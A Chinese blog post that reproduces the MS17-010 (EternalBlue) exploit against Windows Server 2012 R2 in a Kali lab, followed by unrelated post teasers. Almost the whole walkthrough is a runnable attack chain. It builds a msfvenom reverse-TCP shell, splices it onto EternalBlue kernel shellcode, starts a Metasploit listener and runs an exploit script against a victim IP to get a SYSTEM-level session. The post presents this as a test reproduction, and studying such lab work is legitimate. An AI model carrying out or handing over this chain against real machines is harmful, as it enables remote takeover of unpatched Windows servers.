Kali对Windows2012的MS17010漏洞测试 - mntm博客

-
Kali对Windows2012的MS17010漏洞测试 - mntm博客

Kali对Windows2012的MS17010漏洞测试

mntm在2018年12月15日发布

Kali - The Vulnerablity of MS17010 for Windows Server 2012 R2


        本文将复现MS17010漏洞在Windows Server 2012 R2系统下的利用过程,通过使用msf生成的shell以及github上的exp生成的二进制文件相拼接,从而生成一个完整的二进制文件,注入到远程主机的系统进程中。


测试环境


kali linux 2017 x32(attacker)

Windows Server 2012 R2(victim)


准备工作


首先下载相关的PoC

下载eternalblue_kshellcode_x64.asm

下载eternalblue_exploit8.py

相关资源在此不显示,需要者请在评论区留言


操作步骤


1.编译汇编文件

nasm -f bin eternalblue_kshellcode_x64.asm

此命令在本目录下生成对应二进制文件eternalblue_kshellcode_x64

2.生成msf的payload

msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread  LHOST=192.168.254.128 LPORT=4444

-p 指定msf生成的payload的类型

-f  payload的类型

-o 输出的payload的文件名

EXITFUNC 指定这个payload的退出函数

LHOST 本机IP,应使用ifconfig查看kali的IP

LPORT 本机端口,后续payload将连接kali的这个端口

3.组装汇编文件和payload为专用shellcode

cat eternalblue_kshellcode_x64 shell_msf.bin > reverse_shell.bin

reverse_shell.bin为生成的完整shellcode

注:这种组装方式的原理可以查看asm文件,最后一行有注释,后面是自定义的代码,那么拼接payload之后,payload代码将被执行

4.在msf上使用exploit/multi/handler模块

use exploit/multi/handler

5.设置相应的payload,与之前msfvenom命令生成的payload一定要相同

6.设置相应的参数,一定要与msfvenom命令中的参数一致,否则会造成victim蓝屏,设置好之后启动监听

set EXITFUNC thread

set lhost 192.168.254.128

run

192.168.254.128是本次实验的kali系统IP,进行操作时应先使用ifconfig获取本机的IP

7.启动利用程序

python eternalblue_exploit8.py 192.168.254.129 reverse_shell.bin

eternalblue_exploit8.py 利用程序的文件名

192.168.254.129 victim的IP

reverse_shell.bin shellcode文件

8.成功获取对方的session

利用程序显示done之后,msf会监听到一个session

使用以下方法查看已连接的session

sessions -i

9.连入对方机器

sessions -i 1

-i后面的参数为session的Id

此时获取的已经是system权限


MS17010官方详情

分类:     标签:


Tags: published
October 18, 2019 at 12:37PM
Open in Evernote

评论

发表评论

此博客中的热门博文

Telegram MTProto Proxy 介绍说明 – 开源代码|技术|教程资源|网络资源|首页不显示 – 如有乐享

-
图片
Telegram MTProto Proxy 介绍说明 A – A +  我是小马甲~  2018年6月2日  1  16484 次浏览  开源代码 | 技术 | 教程资源 | 网络资源 | 首页不显示  MTProto Proxy | MTProxy | Telegram | Telegram代理 | 科学无忧 | 科学无忧上网 文章目录 酸酸(乳)代理 SOCKS5 Proxy 如何设置 MTProto Proxy 支持的客户端 开源地址 快速参考 注册您的代理 自定义配置 推荐频道 注意到昨天的一个新闻:苹果在全球范围内阻止Telegram消息应用的更新! Telegram 的路不好走呀!前一段儿时间博主的TG群,有人发送不可描述的图片。导致这个群直接被ban!目前看只是针对IOS平台ban了这个群。其他平台暂时没事儿!博主建议大家,好好的聊天!别乱搞! 目前国内已经屏蔽了 Telegram APP相关服务,想使用 TG 必须挂代理才行!下面介绍一些路子方法。 酸酸(乳)代理 这个就不多说了。 SOCKS5 Proxy 比较老的一种代理方式。抗感染能力比较差一点! 下面是网友分享的2个! 1 2 server = r43271237 . teletype . live & port = 1080 & user = telegram & pass = telegram server = r432 . tgproxy . run & port = 1080 & user = telegram & pass = telegram 如何设置 1 2 3 4 5 6 7 8 • Telegram Android ( Settings ➔ Data and Storage ➔ Proxy Settings ) • Telegram X iOS Alpha ( Settings ➔ Data and Storage ➔ Proxy ) • Telegram Des...
阅读全文

CentOS���yum������ffmpeg

-
图片
CentOS���yum������ffmpeg CentOS中yum安装ffmpeg 11点后看到我请举报  关注 2017.11.20 14:02 字数 229 阅读 6209 评论 0 喜欢 1 1.升级系统 sudo yum install epel-release -y sudo yum update -y sudo shutdown -r now 2.安装Nux Dextop Yum 源 由于CentOS没有官方FFmpeg rpm软件包。但是,我们可以使用第三方YUM源(Nux Dextop)完成此工作。 CentOS 7 sudo rpm --import http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro sudo rpm -Uvh http://li.nux.ro/download/nux/dextop/el7/x86_64/nux-dextop-release-0-5.el7.nux.noarch.rpm CentOS 6 sudo rpm --import http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro sudo rpm -Uvh http://li.nux.ro/download/nux/dextop/el6/x86_64/nux-dextop-release-0-2.el6.nux.noarch.rpm 3.安装FFmpeg 和 FFmpeg开发包 sudo yum install ffmpeg ffmpeg-devel -y 4.测试是否安装成功 ffmpeg 5.如果你想了解更多关于FFmpeg使用方面的资料,可以输入: 例子: 使用FFmpeg将mp3转为ogg ffmpeg -i MLKDream_64kb.mp3 -c:a libvorbis -q:a 4 MLKDream_64kb.ogg 使用FFmpeg将flv转为mp4 ffmpeg -i beeen.flv -y -vcodec copy -acodec copy beeen.mp4 Tags: published August 29,...
阅读全文

拜托!面试请不要再问我Spring Cloud底层原理 – 掘金

-
图片
石杉的架构笔记 2018年11月07日 阅读 16874 拜托!面试请不要再问我Spring Cloud底层原理 欢迎关注微信公众号: 石杉的架构笔记(id:shishan100) 每周一至五早8点半,精品技术文章准时送上! 目录 一、业务场景介绍 二、Spring Cloud核心组件:Eureka 三、Spring Cloud核心组件:Feign 四、Spring Cloud核心组件:Ribbon 五、Spring Cloud核心组件:Hystrix 六、Spring Cloud核心组件:Zuul 七、总结 概述 毫无疑问,Spring Cloud是目前微服务架构领域的翘楚,无数的书籍博客都在讲解这个技术。不过大多数讲解还停留在对Spring Cloud功能使用的层面,其底层的很多原理,很多人可能并不知晓。 因此本文将通过大量的手绘图 ,给大家谈谈Spring Cloud微服务架构的底层原理。 实际上,Spring Cloud是一个全家桶式的技术栈,包含了很多组件。本文先从其最核心的几个组件入手,来剖析一下其底层的工作原理。 也就是Eureka、Ribbon、Feign、Hystrix、Zuul这几个组件。 一、业务场景介绍 先来给大家说一个业务场景,假设咱们现在开发一个电商网站,要实现支付订单的功能,流程如下: 创建一个订单后,如果用户立刻支付了这个订单,我们需要将订单状态更新为”已支付” 扣减相应的商品库存 通知仓储中心,进行发货 给用户的这次购物增加相应的积分 针对上述流程, 我们需要有订单服务、库存服务、仓储服务、积分服务 。整个流程的大体思路如下: 用户针对一个订单完成支付之后,就会去找订单服务,更新订单状态 订单服务调用库存服务,完成相应功能 订单服务调用仓储服务,完成相应功能 订单服务调用积分服务,完成相应功能 至此,整个支付订单的业务流程结束 下图这张图,清晰表明了各服务间的调用过程: 好!有了业务场景之后,咱们就一起来看看Spring Cloud微服务架构中,这几个组件如何相互协作,各自发挥的作用以及其背后的原理。 二、Spring Cloud核心组件:Eureka 咱们来考虑第一个问题 :订单服务想要调用库存服务、仓储服...
阅读全文